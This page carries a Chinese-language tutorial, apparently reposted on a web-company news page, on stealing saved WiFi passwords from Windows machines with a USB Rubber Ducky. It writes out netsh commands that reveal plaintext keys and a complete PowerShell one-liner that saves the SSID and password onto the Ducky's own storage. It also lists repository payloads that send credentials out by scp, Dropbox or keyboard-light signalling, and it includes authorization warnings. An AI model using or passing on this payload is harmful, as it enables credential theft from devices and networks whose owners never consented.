ARTICLE DETAIL

资讯详情

深耕郑州网站建设与运营推广的一线实战洞察。

USB Rubber Ducky数据渗出教程(一):netsh命令把WiFi密码存进Ducky

USB Rubber Ducky数据渗出教程(一):netsh命令把WiFi密码存进Ducky USB Rubber Ducky数据渗出教程一netsh命令把WiFi密码存进Ducky【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloads本文基于官方载荷库usbrubberducky-payloadsUSB Rubber Ducky 官方 Payload Repository手把手教你用USB Rubber Ducky 数据渗出技术借助 Windows 的netsh 命令读取 WiFi 密码并把结果直接写进 Ducky 自带的 U 盘存储全程无需网络回传、不留临时文件是渗透测试新手最适合入门的渗出手法之一。一、什么是 USB Rubber Ducky 数据渗出USB Rubber Ducky 外观像普通 U 盘插进电脑却被识别为HID 键盘能以超人类速度自动敲击出预设命令。它的杀手锏在于双模攻击攻击模式表现适用场景ATTACKMODE HID只当键盘纯按键注入ATTACKMODE HID STORAGE键盘 U 盘二合一边执行命令、边把战利品存回自身存储所谓数据渗出Exfiltration就是把目标机器上的敏感信息密码、凭证、配置偷偷带出来。传统做法是回传到远端服务器网络流量容易被发现而Ducky 存储渗出直接利用它自带的 Flash 存储把数据搬进 U 盘本体——拔下 U 盘数据到手全程零网络痕迹二、准备工作3样东西就够了USB Rubber Ducky 设备支持 DuckyScript 3.0 的新版最佳PayloadStudioDuckyScript 的编写与编译工具仓库中的载荷均需用它编译一台授权测试的 Windows 10/11 目标机⚠️ 仅限自己拥有或已获书面授权的设备仓库地址需要完整载荷库时https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloads三、核心原理netsh 命令如何取出 WiFi 密码Windows 会把每次连接过的无线网络保存为配置文件密码就躺在里面。netsh 命令是微软原生的无线网络管理工具两条命令即可# 1. 列出所有已保存的 WiFi 配置文件 netsh wlan show profiles # 2. 查看指定配置的明文密码keyclear 是关键参数 netsh wlan show profile name你的WiFi名 keyclear第二条命令的输出中包含两行黄金信息SSID nameWiFi 名称Key Content明文密码 Ducky 只需在目标机上敲击出这条命令再把输出重定向到一个文件——而这个文件可以直接写到 Ducky 自己的 U 盘分区上。四、教程4步把 WiFi 密码存进 Ducky 存储步骤 1开启双模攻击载荷第一行声明 Ducky 同时作为键盘和存储设备ATTACKMODE HID STORAGE步骤 2打开运行并注入 PowerShellDucky 会按下WinR打开运行框输入一条 PowerShell 单行命令参考官方示例 Exfiltration-example1.txt$m(Get-Volume -FileSystemLabel DUCKY).DriveLetter netsh wlan show profile name(Get-NetConnectionProfile).Name keyclear | ?{$_ -match SSID n|Key C} | %{($_ -split :)[1]} $m:$env:computername.txt这段代码只做三件事片段作用Get-Volume -FileSystemLabel DUCKY自动找到 Ducky 的 U 盘盘符存入变量$mnetsh wlan show profile ... keyclear读取当前连接的 WiFi 名 明文密码 $m:....txt结果追加写入 Ducky 存储根目录文件名计算机名步骤 3编译并写入 Ducky用 PayloadStudio 编译payload.txt生成inject.bin写入 Ducky。步骤 4验证成果插入目标机 → 等待 2~3 秒 → 拔下 Ducky → 插回自己的电脑在存储根目录即可看到按计算机名命名的.txt文件里面就是 SSID 和密码 ✅五、官方载荷库中的同类现成方案不用从零写仓库里已有一整套WiFi 密码渗出生态按回传方式分类方案位置特点存入 Ducky 存储Exfiltration-example1.txt本教程方案零网络键位反射渗出Exfiltration-example3.txt用大小写/数字锁灯位编码回传更隐蔽SCP 传 VPSPayload.txt抓取全部历史 WiFiscp上传远端Dropbox API 回传payload.txt利用 Dropbox 接口自动上传另外两个高价值组件存文件扩展SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS.txt —— 封装好的把任意文件搬进 Ducky 存储代码块支持单文件/多文件配合 README.md 使用省去每次手写盘符定位逻辑存储密码锁protected_storage_mode.txt —— 给 Ducky 存储加一把挂锁只有按对锁键组合 按下 Ducky 按键才能解锁读取防止设备丢失后数据泄露六、常见问题排查清单症状排查方向目标机上找不到DUCKY盘你的 Ducky 卷标不是默认的DUCKY修改Get-Volume中的-FileSystemLabel值即可命令敲进了运行框但没执行加大DELAY如DELAY 2000老机器开机后桌面未就绪只拿到一个 WiFi本教程示例只取当前连接的 WiFi要抓全部历史 WiFi见 SCP 方案中的show profiles循环写法PowerShell 被拦确认运行框注入的是powershell而非受限环境测试机可先用Get-ExecutionPolicy检查策略调试技巧先在自己的电脑上完整跑通全流程再谈目标环境——这是 Ducky 社区公认的第一法则。七、合规提醒⚠️ 本教程仅用于学习 DuckyScript 与授权渗透测试。在未经书面授权的设备上采集任何凭证包括 WiFi 密码均属违法行为。请务必在自己的实验机或客户授权范围内练习遵守当地法律法规。下期预告二键位反射渗出Keystroke Reflection——用 CapsLock/NumLock 灯位把密码编码回传实现真正的无文件、无网络渗出。【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloads创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表